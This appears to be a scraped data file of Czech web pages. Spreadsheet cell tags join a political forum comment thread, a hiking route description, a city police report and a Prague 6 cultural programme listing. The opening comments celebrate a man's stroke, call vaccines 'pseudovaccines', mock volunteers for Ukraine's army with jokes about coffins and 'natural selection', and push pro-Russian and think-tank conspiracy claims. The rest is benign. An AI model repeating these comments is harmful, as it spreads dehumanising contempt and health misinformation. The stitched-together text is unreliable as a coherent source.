Trvalý odkaz Ta nenávist.... .....je pouze zamaskovaný strach co s těmi všemi dobrosery bude, až, nejen v naší kotlince, zvítězí zase normální rozum a oni najednou zjistí, že jsou k ničemu a o jejich moudra tady nikdo nestojí. To bude hóóódně velké mrzeníčko. A fronty na pracáku. Průměrný počet slepic: 4.3 (33 hlasů) Log in to post comments Napsal uživatel Mirekxy dne So, 02. 11. 2024, 10:57 Trvalý odkaz Pic ho Další pecka libtardům mezi oči: https://www.parlamentnilisty.cz/arena/monitor/A-jak-to-ovlivnilo-volby-Ustavni-soud-smetl-zalobu-na-SPD-764181 Průměrný počet slepic: 4.9 ( 21 hlas) Log in to post comments Napsal uživatel KIMJAN dne So, 02. 11. 2024, 11:23 Trvalý odkaz Ale nalejme si čistého: Mrtvice pana Krause nás zrovna nezarmoutila... Průměrný počet slepic: 4.3 (26 hlasů) Log in to post comments Napsal uživatel Bob dne So, 02. 11. 2024, 12:18 In reply to Ale nalejme si čistého: by KIMJAN Trvalý odkaz už si farmaka prachy za propagaci pseudovakcíny neužije, gauner Průměrný počet slepic: 4.5 (24 hlasů) Log in to post comments Napsal uživatel Itkica dne So, 02. 11. 2024, 19:39 In reply to Ale nalejme si čistého: by KIMJAN Trvalý odkaz Kimjan Ale je trochu rozdíl být zarmoucen z úmrtí de facto neznámého člověka, nebo mu nenávistně přát smrt jen tak z plezíru. Či vykřikovat jiné agresivní obludnosti. Určitě ani tomuto pánovi bych nic takového nepřála... Průměrný počet slepic: 4.2 (5 hlasů) Log in to post comments Napsal uživatel KIMJAN dne So, 02. 11. 2024, 11:24 Trvalý odkaz Jasný vzkaz „Rád bych vás hned varoval, že se nebude opakovat scénář s Minskými dohodami, žádné zmrazení fronty, aby si Zelenského režim mohl „lízat rány“. Stejně jako Ukrajina nevstoupí do NATO v té či oné podobě. (Stálý představitel Ruské federace při OSN Vasilij Něbenzja ). Průměrný počet slepic: 4.9 ( 31 hlas) Log in to post comments Napsal uživatel Bob dne So, 02. 11. 2024, 12:20 In reply to Jasný vzkaz by KIMJAN Trvalý odkaz teď už Rusko nemusí nikam ustupovat, ale může vystupovat z pozice síly Průměrný počet slepic: 4.9 (23 hlasů) Log in to post comments Napsal uživatel KIMJAN dne So, 02. 11. 2024, 13:41 Trvalý odkaz V Rusku je prý za nárůstem ceny másla vyšší spotřeba zmrzliny. Podívejme se na Rusy: oni si mohou dovolit dělat zmrzlinu ze smetany! A to jsou - na rozdíl od nás -pod sankcemi... Průměrný počet slepic: 4.8 (20 hlasů) Log in to post comments Napsal uživatel Bob dne So, 02. 11. 2024, 14:49 In reply to V Rusku je prý za nárůstem ceny másla vyšší spotřeba zmrzliny. by KIMJAN Trvalý odkaz tady je zmrzlina snad z margarínu, ale cena jak v centru Florencie Průměrný počet slepic: 4.7 (15 hlasů) Log in to post comments Napsal uživatel KIMJAN dne So, 02. 11. 2024, 13:55 Trvalý odkaz Opatření na podporu českého HDP Prezident České republiky vyhověl 60 žádostem občanů země o vstup do ukrajinské armády. Informuje o tom Český rozhlas s odvoláním na tiskového mluvčího Petra Pavla. Lze očekávat zvýšení poptávky po truhlářských a kremačních službách. Vlastně i kovovýroba si přijde na své - mrtvoly z ciziny přes hranice pouze v kovových futrálech. Průměrný počet slepic: 4.6 (18 hlasů) Log in to post comments Napsal uživatel Bob dne So, 02. 11. 2024, 14:50 In reply to Opatření na podporu českého HDP by KIMJAN Trvalý odkaz jejich zbytky mají zaházet do země v jejich milované UA Průměrný počet slepic: 5 (14 hlasů) Log in to post comments Napsal uživatel Zauber dne So, 02. 11. 2024, 16:21 In reply to Opatření na podporu českého HDP by KIMJAN Trvalý odkaz Prý, 60 blbů si chce zastřílet. 60 blbů si myslí, že jede na výlet. Pe-Pa by jim měl při té příležitosti hned udělit řád Bílého vola. Pokud tímto řádem ještě nedisponuje, mělo by se to neodkladně napravit. Průměrný počet slepic: 4.9 (17 hlasů) Log in to post comments Napsal uživatel Střelec dne Ne, 03. 11. 2024, 18:50 In reply to Prý, by Zauber Trvalý odkaz zvýšení IQ Pepa 107 pracuje na zvýšení průměrného IQ v ČR cestou přirozeného výběru. Blahoslavme Darwina! Průměrný počet slepic: 4 ( 1 hlas) Log in to post comments Napsal uživatel iw23 dne So, 02. 11. 2024, 14:21 Trvalý odkaz Aspen annual conference Výroční konference Aspen sdružuje transatlantické vůdce, aby diskutovali o klíčovém politickém, ekonomickém a společenském vývoji na základě odborných studií poskytnutých našimi partnery ………….s nažíme se také o podporu širšího konsenzu mimo rámec jednoho volebního cyklu……….. a p řekonat vysokou polarizaci názorů a stát jednotně na podpoře západních hodnot……... s polupracujeme s renomovanými poradenskými a výzkumnými firmami, jako jsou Boston Consulting Group , Data Ethics Lab a PAQ Research na odborných zprávách………..Výroční konference Aspen je jednou z vlajkových lodí institutu, která se koná od jeho založení v Praze v roce 2012……. Celé promo zde : https://www-aspeninstitutece-org.translate.goog/program/annual-conference/?_x_tr_sl=en&amp;amp;_x_tr_tl=cs&amp;amp;_x_tr_hl=cs&amp;amp;_x_tr_pto=sc A ejhle, v roce 2020 se zúčastnil konference i Andrej Babiš , takže je hned jasnější, odkud se tehdy u něj vzala nutkavá potřeba očkov at všechny lidi včetně nemluvňat (kromě apelu z WHO ) http://web.archive.org/web/20201125101130/https://www.aspeninstitutece.org/people_tags/aspen-annual-conference/ Takže to funguje asi t ak, že Aspen Institute shromáždí všechny lidi kteří mají na Západě nějakou reálnou moc na jednom místě a tam ji mi manipulují pomocí odborn ých zpráv spřátelených think-tanků. Tak teď už asi vím co myslel Fiala tím, že čerpá jen z důvěryhodných zdrojů :-) Průměrný počet slepic: 4.3 (15 hlasů) Log in to post comments Napsal uživatel Bob dne So, 02. 11. 2024, 14:51 In reply to Aspen annual conference by iw23 Trvalý odkaz rozdají noty Průměrný počet slepic: 4.6 (13 hlasů) Log in to post comments Napsal uživatel Chuck dne So, 02. 11. 2024, 15:23 </t>
  </si>
  <si>
    <t>6710</t>
  </si>
  <si>
    <t>18550</t>
  </si>
  <si>
    <t>20241101_150_3245247421_8d906433f778cf8e95eb.html</t>
  </si>
  <si>
    <t>8d906433f778cf8e95eb</t>
  </si>
  <si>
    <t>Z Vinoře do Staré Boleslavi</t>
  </si>
  <si>
    <t>Z Vinoře do Staré Boleslavi U metra Vysočanská nasedneme do autobusu č. 182 a vystoupíme ve stanici Vinořský hřbitov. Zde se vypravíme vlevo k hlavnímu vstupu na hřbitov. V parčíku před ním je hned několik pomníků obětem válek. Na hřbitově kromě hrobů místních obyvatel najdeme klasicistní stavbu hrobky Černínů z první poloviny 19. století. Sloužila jako pohřebiště vinořské linie šlechtického rodu Czerninů. Budova je památkově chráněná. My jdeme dále ke kruhovému objezdu. Za ním přejdeme přechod, pokračujeme vlevo ulicí Velínská a dojdeme na náměstí s kostelem Povýšení sv. Kříže. Jedná se o barokní trojlodní stavbu bazilikálního typu. Ke kostelu se váže pověst o pyšné hraběnce Černínové, která protože přišla do kostela na mši ve střevíčkách z chleba, se v kostele propadla. Před kostelem je barokní fara se zachovalým špýcharem a dalšími hospodářskými budovami. Na dvoře roste památná, přes sto let stará lípa srdčitá. Dále zde vidíme vrchnostenskou váhu. Kdybychom za ní šli po žluté, dojdeme k baroknímu zámečku. Hlavní budova je čtvercového půdorysu s prostornou centrální dvoranou. K severovýchodu stojí hospodářská křídla, jihovýchodním směrem navazuje park, jenž je přístupný, zatímco budova zámku ne, patří policii. Na průčelí zámku je erb Černínů z Chudenic . My se vrátíme zpět na náměstí a jdeme pod kostelem uličkou Urbanická , kde mineme sklípkovou studánku umístěnou v soklu kříže, proto studánka Pod křížkem. Na konci uličky odbočíme vlevo a dojdeme ke dvěma rybníkům Malá a Velká Obůrka. Mezi nimi je turistický ukazatel, od kterého pokračujeme dále po červené a žluté Svatojakubskou-Žitavskou cestou podél Vinořského potoku. Nad námi jsou pískovcové skály včetně výklenku, kde před druhou světovou válkou stávala hospůdka. Dnes je zde ohniště s posezením. Cestou mineme několik studánek. Vyjdeme u silnice, po které pokračujeme a asi po sto metrech sejdeme k Cukrovarnickému rybníku. Za rybníkem na druhé straně stojí jedna z výklenkových kaplí poutní cesty z Prahy do Staré Boleslavi Via Sancta k Paladiu země české. Čtyřicet čtyři výklenkových kaplí podél cesty od Špitálské brány přes Vysočany , Kbely, Vinoř , Dřevčice, Vrábí, Brandýs bylo postaveno v letech 1674-1690 přičiněním staroboleslavských jezuitů. Stály v pravidelných rozestupech, měly téměř stejnou podobu, každá měla svého donátora. Dle legendy jde o cestu, po které byly převáženy ostatky sv. Václava . Po červené dojdeme do Jenštejna ke zřícenině hradu. Gotický vodní hrad vznikl ve 30. letech 14. století za Jence z Janovic. Nejzachovalejší je kruhová věž vysoká dvaadvacet metrů. Uvnitř stoupáme točitým schodištěm do jednotlivých pater s expozicemi. Vrchol je upraven na rozhlednu. Místa, na něž se díváme, jsou zde přehledně popsaná. V přízemí hradní věže můžeme nahlédnout proskleným průhledem do podzemní „hladomorny“. Ve strážním domku je další expozice a pokladna. Z Jenštejna pokračujeme stále po červené do obce Dřevčice. V Dřevčicích mineme další dvě výklenkové kaple po levé ruce. Dál půjdeme kolem vstupu do bývalé tvrze Dřevčice. Poznáte ji podle erbu vedle vchodu. Poprvé se o ní píše 1364 jako o majetku litomyšlského biskupa. Dnes slouží jako kopie středověkého zájezdního hostince. Pořádají se zde různé historické slavnosti, akce pro uzavřené společnosti až po svatby v autentickém, ranně středověkém, historickém prostředí. Hodovní síň je vyzdobena obrazy postav českých dějin a osvětlení je řešeno působivou kombinací svící a loučí. Interiér tvoří čtyři nadzemní podlaží a klenuté gotické sklepení. Jednotlivá podlaží jsou propojena dřevěným schodištěm, mají originální dřevěné trámové stropy, podepřené původními dubovými sloupy. Kolem zpustlé zahrady tvrze a dál cestou v zeleni dojdeme na náves obce Popovice , kde u malého rybníčku na vrbě visí různé plechovky od piva . Vtipní obyvatelé, dobrý nápad. Na rozcestí se sochou sv. Václava odbočíme doprava po červené na polní cestu, kterou dojdeme do Brandýsa nad Labem až do centra k zámku a po mostě generála Lišky nad Labem s plavební komorou a slalomem se stále rovně dostaneme až do Staré Boleslavi s mnoha církevními památkami. Před cestou zpátky se dobře najíme za bazilikou sv. Václava v restauraci V Pivovaře. Do Prahy můžeme jet pohodlně autobusem přímo ze Staré Boleslavi nebo se vrátit na autobus do Brandýsa . V nohou máme asi čtrnáct kilometrů. Autor: KČT, odbor Praha-Karlov, oddíl Turban, Marta Kravčíková Autor person Marta Kravčíková</t>
  </si>
  <si>
    <t>20241101_151_3244501709_97e071288cb290550c3e.html</t>
  </si>
  <si>
    <t>97e071288cb290550c3e</t>
  </si>
  <si>
    <t>MĚSTSKÁ POLICIE</t>
  </si>
  <si>
    <t>MĚSTSKÁ POLICIE Dopadení pachatelů loupežného přepadení Dne 28. září přijalo naše operační středisko oznámení o loupežném přepadení v ulici Mohylová s tím, že osoby podezřelé z loupeže se pohybují zřejmě směrem k ulici Píškova. Po příjezdu na místo zahájili strážníci pronásledování dvou utíkajících mužů, kteří se snažili ukrýt v přilehlém porostu. Strážníkům se po poměrně dramatickém pronásledování podařilo oba muže dostihnout a za použití donucovacích prostředků zpacifikovat. Jednalo se o dva mladíky z Prahy , kteří odpovídali popisu pachatelů loupežného přepadení. Celý případ si na místě převzali kolegové z Policie České republiky pro podezření z trestného činu loupeže. Poškozování cizí věci Dne 16. září kolem jedenácté hodiny večerní prověřovala autohlídka městské policie oznámení o poškození skleněných výplní zastávek městské hromadné dopravy. Na základě prověrky velmi hodnotné svědecké výpovědi a následném provedeném pátrání byl na místě nalezen podezřelý, asi šedesátiletý muž, jenž byl v tak silně podnapilém stavu, že nebyl ani schopen klást zasahujícím strážníkům odpor. Dechovou zkouškou mu pak byly naměřeny více jak dvě promile alkoholu . Po zjištění jeho totožnosti si pachatele převzali policisté z místního oddělení, neboť se s ohledem na výši způsobené škody jednalo v tomto případě o podezření z přečinu poškozování cizí věci. Tomáš Navrátil , vrchní komisař MP</t>
  </si>
  <si>
    <t>20241101_152_3245423355_60d17488ccef06db20e0.html</t>
  </si>
  <si>
    <t>60d17488ccef06db20e0</t>
  </si>
  <si>
    <t>Kulturní programy</t>
  </si>
  <si>
    <t>Kulturní programy → DIVADLO SEMAFOR Dejvická 688, Praha 6 , tel.: 233 901 384, vstupenky@semafor.cz, semafor.cz 1. 11. ŠLI TŘI ŠLITŘI 2. 11. Co na světě mám rád 3. 11. THE SWINGS and special guest RH Big Band 4. 11. Nižní Novgorod 5. 11. Všechnopárty 6. 11. Všechnopárty 7. 11. Osvobozené divadlo Semafor 11. 11. Devatenáct tváří jazzu 12. 11. Bárka a Martha Elefteriadu 13. 11. Poslední štace 15. 11. A přece se točí 17. 11. Zuzana Stirská a Fine Gospel Time slaví! 18. 11. Všechnopárty 19. 11. Všechnopárty 22. 11. Kytice 23. 11. Kytice 24. 11. Jazzový štrůdl Evy Emingerové 26. 11. Dobře placená procházka 27. 11. JE VÁNOČNÍ ČAS… koncert Leony Machálkové s kapelou 28. 11. ŠLI TŘI ŠLITŘI 29. 11. Návštěvní den u Miloslava Šimka 30. 11. Dveře dokořán pro Karla Plíhala → DIVADLO S + H Dejvická 919, Praha 6 , tel.: 224 316 784, pokladna@spejbl-hurvinek.cz, spejbl-hurvinek.cz 2. 11. 14.00 Spejbl, Hurvínek a já 2. 11. 16.30 Spejbl, Hurvínek a já 3. 11. 11.00 Spejbl, Hurvínek a já 3. 11. 14.00 Spejbl, Hurvínek a já 3. 11. 15.00 Víkendové dílny loutkoherectví pro děti 8. 11. 19.00 Hurvínek prodává nevěstu 9. 11. 14.00 Hurvínek prodává nevěstu 9. 11. 16.30 Hurvínek prodává nevěstu 9. 11. 17.45 Víkendové dílny loutkoherectví pro děti 10. 11. 11.00 Hurvínek prodává nevěstu 10. 11. 14.00 Hurvínek prodává nevěstu 16. 11. 14.00 Hurvínkova vánoční záhada 16. 11. 16.30 Hurvínkova vánoční záhada 17. 11. 11.00 Hurvínkova vánoční záhada 17. 11. 14.00 Hurvínkova vánoční záhada 17. 11. 16.30 Hurvínkova vánoční záhada 23. 11. 14.00 Hurvínek prodává nevěstu 23. 11. 16.30 Hurvínek prodává nevěstu 24. 11. 11.00 Hurvínkova vánoční záhada 24. 11. 14.00 Hurvínkova vánoční záhada 24. 11. 16.30 Hurvínkova vánoční záhada 30. 11. 11.00 Hurvínkův Mikuláš 30. 11. 14.00 Hurvínkův Mikuláš 30. 11. 16.30 Hurvínkův Mikuláš 30. 11. 17.45 Víkendové dílny loutkoherectví pro děti → DEJVICKÉ DIVADLO Zelená 1084/15a, Praha 6 . Kompletní program divadla včetně hlavní scény na dejvickedivadlo.cz ANTI.KVARIÁT DD 3. 11. 16.00 MEDAŘ → loutková pohádka 10. 11. 16.00 VŠECHNO NEJLEPŠÍ 12. 11. 17.30 SOUMRAČNÍK REZAVÝ → knihy veršů Tanii Stránské 13. 11. 16.00 DŮM VZPOMÍNEK – 1989 → loutková pohádka 14. 11. 19.00 ČTENÍ S RESPEKTEM → Fareed Zakaria : Věk revolucí 15. 11. 18.00 MUZEUM PAMĚTI XX. STOLETÍ. Debata: Paralely vývoje po roce 1989 v Československu a na Ukrajině 16. 11. 14.30 MARATON HAVEL. 35. výročí Sametové revoluce. Promítání s besedou 18. 11. 20.00 VEČER JEDNA BÁSEŇ. Talk show Lukáše Pavláska . Hosté Jiří Padevět a Tomáš Belko 24. 11. 16.00 SNĚHURKA → loutková pohádka 25. 11. 20.00 KUŠ, SVINĚ! 26. 11. 20.00 JÁTRA 28. 11. 20.00 CO.MEDIA. Host Martina Myšičky MUDr. Filip Tylš 30. 11. 19.30 NOC6 → Lety mimo (táboráková verze) → KAŠTAN — SCÉNA UNIJAZZU Bělohorská 150, Praha 6 , tel.: 233 353 020, kastan@kastan.cz, kastan.cz 1. 11. 20.00 → koncert Jiný Metro, Jan Váňa, indie folk 2. 11. 15.00 → dětské představenípředstavení divadlo Kasperle - O holčičce, která zlobila 2. 11. 20.00 → koncert Čtvrt na smrt (křest alba), Cermaque, indie folk 4. 11. 16.30 → vernisáž výstavy Lenka Wenzelová. „Různými cestami“ 5. 11. 18.30 → Přednáška Arch. Zdeňka Lukeše: Čeští architekti v meziválečném Slovensku 6. 11. 20.00 → koncert 3x H: Hlas &amp;amp;amp; Hříbal &amp;amp;amp; Hilský,folk, blues, písničkářství 7. 11. 20.00 koncert Fénix, Hazuka, Jensena Třásá, folk, world music 9. 11. 15.00 → dětské představení divadlo Harmonika - Sněžibába a čert 9. 11. 20.00 koncert Taste The Lemon, indie rock, trip hop 12. 11. 19.30 → divadlo BENEFICE: Divadelní soubor TOPUDE! - Vnitřní hlas 13. 11. 16.00 → dětské představeníloutkové představení Sváťovo dividlo – Šípková Růženka 13. 11. 19.00 → koncert The Quarantines, LoadOut, Burn Kit (US), rock, punk, metal 14. 11. 18.30 → koncert Ondřej Galuška Orchestra a Jana Kozubková , koncert pro děti i dospělé 15. 11. 19.30 → divadlo s koncertem divadlo ExLudvíci: Rychlorande (ft. Přetlak věku), komedie s živou kapelou 16. 11. 15.00 → dětské představení divadlo DamDam - Kašpárek a princezna 16. 11. 20.00 → koncert Petr Linhart &amp;amp;amp; Josef Štěpánek, folk 20. 11. 20.00 → koncert Žamboši, folk 21. 11. 20.00 → koncert Představy postavy, Furt rovně, alternativní rock, šanson 22. 11. 19.00 → festival Podzimní festival Osamělých písničkářů I., folk 23. 11. 15.00 → dětské představení Profesor Zlomtužka - Kouzelné malování s čarováním 23. 11. 17.30 → festival Podzimní festival Osamělých písničkářů II., folk 26. 11. 20.00 → koncert Jan Kysela, David Holý, kytarový recitál 27. 11. 20.00 → koncert Honza Jícha s kapelou, folk, pop 28. 11. 20.00 → koncert Zuby nehty, alternativní rock 29. 11. 20.00 → koncert Jan Burian , folk 30. 11. 15.00 → dětské představení Divadelní studio Neklid - Nebojsa 30. 11. 19.30 → koncert NOC6: Kolowrat (SK), Terrible 2s (SK), alternativní rock Výstava 1.–30. 11. 2024 Lenka Wenzelová: „Různými cestami“ → PÍSECKÁ BRÁNA K Brusce 5/208, Praha 6, info@piseckabrana.cz, piseckabrana.cz 12. 11. 16.00 → Tak trochu sváteční Shakespearovská pošta, literárně hudební pořad v rámci Fresh senior 15. 11. 19.00 → koncert Marta Töpferová a SOMBRAS 19. 11. 16.00 → komorní koncert v rámci Fresh senior TRIO EMIDA, 19. a 20. 11. → výstava obrazů Česko očima migrantů 27. 11. 17.00 → vernisáž fotografií Černobílé úsměvy Františka Dostála → VILLA PELLÉ Pelléova 91/10, Praha 6 , tel.: 224 326 180, info@villapelle.cz, villapelle.cz Výstavy 2. 10.–10. 11. Adéla Součková a Adriena Šimotová : 1 + 1 = 1 28. 11.–12. 1. Martin Krajc : Temptations Nedělní škola umění hrou 13. 11. výroba masek na obličej pomocí sádrových obvazů (nutné pracovní oblečení) 24. 11. výroba obrazu z ručního papíru. Pravidelný a oblíbený kroužek podporuje v dětech kreativitu, rozvíjí fantazii, rozšiřuje obzory a přináší spoustu zábavy. Přijďte s námi tvořit a objevovat vlastní umělecký talent! Každou druhou neděli, 8 lekcí výtvarných experimentů. Vhodné pro děti od 6-12 let. → KC KLUBOVNA Generála Píky, Praha 6 , tel.: 739 834 056, klubovna@povalec.cz, klubovna.povalec.cz 1. 11. 19.00 → koncert Reyko (UK/ES), Ice Hokku (ISR), PoloMy 2. 11. 19.00 → koncert Kryptozpyt: Vyšehrad , Budeč , Hnilomorna 4. 11. 19.00 → kvíz 15 let Klubovny: Hromkův všeobecný vědomostní kvíz 5. 11. 19.00 → turnaj 15 let Klubovny: Fotbálkový turnaj 6. 11. 19.00 → promítání 15 let Klubovny: Alešův zábavný filmový večer 7. 11. 19.00 → koncert 15 let Klubovny: Squared Circles + Drum’n’rap 8. 11. 19.00 → koncert 15 let Klubovny: Ufajr + Sedm zbytečných 9. 11. 19.00 → koncert 15 let Klubovny: Lazer Viking + Laokoon 11. 11. 19.00 → koncert David Kozák , Younger Dryas, 2 dny pěšky 12. 11. 19.00 → přednáška Spolek posluchačů architektury. Zkušenosti 13. 11. 20.00 → promítání Filmový klub 14. 11. 19.30 → koncert Hi-fi, Develooper 15. 11. 19.30 → koncert Sdružení rodičů a přátel ropy, Chorobopop 16. 11. 19.30 → koncert Gast (DE), Teer (DE) 18. 11. 19.30 → koncert Zdeněk Charvát , Overfloaters 19. 11. 19.30 → koncert Kapitáni průmyslu, Obyvatelé cihlového domu 20. 11. 19.30 → koncert Lucifungus ( AUS ), LoFuzz 21. 11. 19.30 → koncert Youlie 22. 11. 19.30 → koncert První hoře, Sen triplet 23. 11. 19.00 → djs Simulacrum 25. 11. 19.30 → koncert Azalu 26. 11. 19.30 → divadlo Tajemství vesmíru 27. 11. 20.00 → promítání Filmový klub 28. 11. 19.30 → koncert Ploy – křest alba 29. 11. 19.30 → koncert Their Dogs Were Astronauts (AT), Between the Planets 30. 11. 19.00 → koncert NOC6 – klubová noc Prahy 6: Stříbrný Rafael, Josefina Dusk, 1flfsoap → KINO DLABAČOV Bělohorská 24, Praha 6 . Pokladna otevřena 30 min. před začátkem představení, dlabacov.cz, facebook.com/dlabacov.cz. 2. 11. 14.00 200% Vlk → český dabing 16.00 Život k sežrání 18.00 Zahradníkův rok 20.00 Substance 3. 11. 14.00 Moje kouzelná rodinka → český dabing 16.00 Velký pán 18.00 Konkláve 20.00 Vetřelec: Romulus 5. 11. 16.00 Karaoke blues 18.00 Tajemství smrti 20.00 Tatami 6. 11. 16.00Amélie z Montmartru 18.00 The Apprentice: Příběh Trumpa 20.00 Zuzana Vlčeková &amp;amp; band – The best of pop and jazz → koncert 20.15 Ďáblova sbírka 7. 11. 16.00 Prado – sbírka plná divů 18.00 Chlupatá rodinka 20.00 Anora 9. 11. 14.00 Pyšná princezna 16.00 Transformers Jedna → český dabing 18.00 Ďáblova sbírka 20.00 Substance 10. 11. 14.00 Pyšná princezna 19.00 Už tě mám dost! → divadlo 13. 11. 16.00 V hlavě 2 → český dabing 18.00 Vlny 20.30 The Apprentice: Příběh Trumpa 18. 11. 16.00 Manželé Stodolovi → KINO SENIOR 18.00 Poklad 20.00 Vlny 19. 11. 16.00 Zóna zájmu 18.00 Architektura ČSSR 58–89 20.00 Anatomie pádu 20. 11. 16.00 Létání pro začátečníky 18.00 The Apprentice: Příběh Trumpa 20.00 Nebula: Alice Bauer &amp;amp; Mirek Fiedler 20.15 Gladiátor II 23. 11. 11.00 a 16.00 Miro Jaroš: Šťastné a veselé s Lipánkem → koncert pro děti 20.00 Gladiátor II 25. 11. 16.00 Gump – jsme dvojka → KINO SENIOR 18.00 Výjimečný stav 20.00 After Party 26. 11. 16.00 Fremont 18.00 Ještě nejsem kým chci být 20.00 Vedlejší pokoj 27. 11. 16.00 Tonda, Slávka a kouzelné světlo 18.00 Chlupatá rodinka 20.00 Vlny 28. 11. 16.00 Botticelli – Florencie a Medicejští 18.00 Dozorkyně 20.00 Gladiátor II 29. 11. 16.00 Víly z Inisherinu → KINO SENIOR 18.00 Vedlejší pokoj 30. 11. 10.00 Štístko a Poupěnka – Pojď si hrát! → KONCERT PRO DĚTI 14.00 Pyšná princezna 19.00 Nohy vzhůru! → DIVADLO 1. 12. 14.00 Život k sežrání 16.00Odvážná Vaiana 2 → český dabing 18.00 Vedlejší pokoj 20.00 Gladiátor II → DDM PRAHA 6 U Boroviček 650/5, 163 00 Praha 17-Řepy, ddmp6.cz, tel.: 235 323 333 2. 11. 9.00–15.00 Halloweenská sobota v DDM 2. 11. – 3.11. 16.00–10.00 Halloweenská přespávačka – přespávačka v domečku. Nutné přihlášení předem na barbora.krpatova@ddmp6.cz 2. 11. 10.00–12.00 a 12.00–14.00 keramická dílna. Přihlášky předem mailem nebo online 8. 11. 16.30–19.30, Petřín , bojovka na téma Strašidla staré Prahy . Na akci je nutná registrace předem na: www.prazskabojovka.cz 13. 11. 15.30 – 18.30 Dopravní hřiště – Vypich a Obora Hvězda, měřený trénink v orientačním běhu 29. 11. 16.00–18.00, 17.00–19.00 a 18.00–20.00 Výroba adventních věnců . Přihlášení na gabriela.lasikova@ddmp6.cz 30. 11. 9.00–11.00 a 11.00–13.00 Vánoční tvořivé dílny. Přihlášky předem na gabriela. lasikova@ddmp6.cz 30. 11. 9.00–18.30 Rozsvícení vánočního stromu v DDM → SENIORFITNES Uralská 6, Praha 6 , tel.: 281 910 522, seniorfitnes.cz Kurzy Každé pondělí: angličtina Každé úterý: bridž, italština, francouzština Každou středu: angličtina, tai chi, jóga, cvičení Feldenkrais Každý pátek: kurz sebeobrany, cvičení na židlích–pátek 16.00 Pravidelná cvičení Tatran Střešovice pondělí 9.00–10.00, čtvrtek 14.00–15.00 FTVS UK úterý 11.00–12.00 TJ Sokol Dejvice čtvrtek 10.00–11.00 Bazén Strahov pondělí 12.00–13.00, čtvrtek 12.30–13.30 → FRESH SENIOR Villa Pellé, Pelléova 10, Praha 6 , Písecká Brána K Brusce 5, Praha 6 , tel.: 224 326 180, e-mail: info@ porteos.cz, freshsenior.cz 15. 11. 16.00 Putování do Santiaga de Compostela . Přednáška s projekcí cestovatelky a fotografky Terezy Košnarové. Na akci je nutná rezervace na karolina@freshsenior.cz 12. 11. 16.00 Tak trochu sváteční Shakespearovská pošta. Literárně hudební pořad v Písecké bráně. 19. 11. 16.00 TRIO EMIDA. Komorní koncert v Písecké bráně. 26. 11. 16.00 Adventní tvůrčí dílna ve Ville Pellé. → KC ŠLEJNICKÁ Komunitní seniorské centrum Pečovatelská služba Prahy 6 . Informace na 736 489 330, e-mail: ksec@psp6.cz 4. 11. Cvičení na židlích 14.00 – 15.00 I. skupina 15.00 – 16.00 II. Skupina 5. 11. 13.30 – 16.00 Výtvarný ateliér „Vyšíváme korálkové brože“ 5. 11. 14.00 – 15.30 Stop zapomínání – II. Skupina 7. 11. 14.30 – 16.00 „S plachetnicí do Antarktidy “ Cestovatelská přednáška RNDr. Karla Wolfa 11. 11. Harmonizační cvičení 14.00 – 15.00 I. skupina 15.00 – 16.00 II. Skupina 12. 11. 14.00 – 15.30 Stop zapomínání – I. skupina 13. 11. Kurz PC 15.00 – 16.00 I. skupina 16.00 – 17.00 II. skupina 14. 11. 14.30 – 16.00 „Vyprávění o poutní cestě do Hájku u Prahy “ Přednáška PhDr. Kateřiny Pařízkové 18. 11. Cvičení na židlích 14.00 – 15.00 I. skupina 15.00 – 16.00 II. Skupina 19. 11. 13.30 – 16.00 Výtvarný ateliér ,,Ozdoby na stromeček z ruliček toaletního papíru” 19. 11. 14.00 – 15.30 Stop zapomínání – II. Skupina 20. 11. 14.00 – 16.00 Hrajeme scrabble 21. 11. 14.30 – 16.00 Taneční hodinka s baletním mistrem Dr. Petrem Veletou 25. 11. Cvičení na židlích s theraband gumou 14.00 – 15.00 I. skupina 15.00 – 16.00 II. Skupina 26. 11. 14.00 – 15.30 Stop zapomínání – I. skupina 27. 11. Kurz PC 15.00 – 16.00 I. skupina 16.00 – 17.00 II. skupina 28. 11. 14.00 – 16.00 Procházka s výkladem oborou Hvězda – sraz: zastávka autobusu 108 „Sídliště Petřiny“ Výhled na prosinec: Petr Tomeček : „Čarovná flétna“ → NESEDÍM, SOUSEDÍM Roh Anastázovy a Sartoriovy ulice, Břevnov , tel.: 702 816 476, nesedimsousedim.cz Každé pondělí: 8.30–9.30 Pilates s Ditou 9.30–11.30 Dvorek: klub pro děti 0–3 roky 14.30–15.15 Hravá jóga pro děcka 6–8 15.00–16.30 Kurz animace pro děti 8–11 16.30–18.00 Kurz animace pro děti 12–15 17.15–18.45 Sousedský orchestr 19.00–20.00 Hatha jóga Každé úterý: 8.30–13.00 Tykadlo / školička pro děti 11.00–12.15 Jóga pro seniory 13.45–14.45 Zdravotní cvičení s Irenou 15.00–16.30 Břevnovský express 15.00–16.00 Běžím–nesedím 7–15 15.00–15.45 / 16.00–16.45 Fúfú Band 17.00–18.30 Tvůj komiks 10–15 19.00–20.00 Jóga na pohodu Každou středu: 8.30–13.00 Tykadlo / školička pro děti 9.00–10.30 Angličtina pro dospělé 14.00–15.00 Angličtina pro děti–začátečníci 15.00–16.00 Angličtina pro děti–středně pokročilí 16.00–17.30 Divadelní kroužek pro děti 18.00–19.00 Jóga s Ester Každý čtvrtek: 8.30–9.30 Běžím–nesedím (dospělí) 8.30–12.30 Tykadlo / školička 14.30–15.30 Klub pro seniory 15.00–17.00 Rukodělná dílna pro děti 16.00–17.30 Malí výtvarníci 17.00–18.30 Angličtina pro dospělé 18.00–19.30 VÝTVARKA PRO VŠECHNY 19.00–20.00 Hatha jóga s Klárou Každý pátek: 8.00–9.00 Jóga pro ranní probuzení 9.00–11.30 Volná herna 12.00–13.30 V pátek nejím sám 14.00–15.00 Zdravotní cvičení na židlích 1. 11. 16.00–19.00 Dušičkové vzpomínání 4. 11. a 18. 11. 17.00–18.00 Konzultace s ajťákem, nutná rezervace 5. 11. a 19. 11. 17.00–19.00 Hudební klub s Mary C, 12–18 let 9. 11. 9.20–14.00 výlet Do Buštěhradu za Otou Pavlem , nutná rezervace 12. 11. 18.00–19.30 přednáška s workshopem Dejme věcem druhou šanci, aneb jak na reuse v praxi 20. 11. 18.00–19.30 přednáška Cibuloviny: na podzim sázíme, na jaře se radujeme 21. 11. 11.00–12.30 komentovaná prohlídka ve Veletržním paláci Surrealismus, expozice První republika a Černobílá doba, nutná rezervace 27. 11. 18.00–21.00 Přešívárna 3 .5 → MĚSTSKÁ KNIHOVNA V PRAZE pobočka Petřiny, U Petřin 2511/1, Praha 6 , tel.: 770 130 242 Každé úterý 15.00 Doučování v knihovně Každý čtvrtek 12.30 Výtvarný klub seniorů, 15.00 Konverzace v angličtině Každý pátek 16.00 